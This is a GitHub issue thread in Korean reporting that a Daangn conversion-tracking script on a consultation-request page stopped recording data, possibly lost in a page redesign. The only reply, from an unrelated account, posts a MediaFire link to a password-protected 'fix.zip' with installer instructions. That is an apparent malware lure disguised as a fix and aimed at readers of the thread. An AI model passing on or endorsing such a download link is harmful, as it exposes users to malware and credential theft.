### ISSUE TITLE
[BUG] 당근마켓 전환 추적 코드 미집계 오류

### ISSUE THREAD

**Issue by EDAEUN** [daangn/karrot-conversion-tracker-tool-support#112]
**Describe the bug**
안녕하세요, 윤선생 당근마켓 전환 추적 코드가 미집계되고 있는 오류 보고 드립니다.

현재 서비스신청(SubmitApplication) 전환 추적 코드가 5/31일을 마지막으로 데이터 수집이 끊긴것으로 보여
지난 5/17에 신청하기 CTA 버튼에 스크립트 삽입이 되었는데 미집계 사유 문의 드립니다.
* 신청 페이지: https://www.yoons.com/experience/consultationRequest
* 신청 버튼: 페이지 최하단의 [신청] (아래 이미지 참고)

의심되는 사유는 6월에 페이지 변경으로 인해 페이지 시안이 변경되었는데
해당 시점에 CTA 버튼에 삽입된 스크립트도 유실되었을수 있을듯 하여 자세한 확인 부탁 드립니다.

![image](https://github.com/user-attachments/assets/8b94ce15-67b2-468b-b2c1-269e23390958)

**Comment by cnhbliyou** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
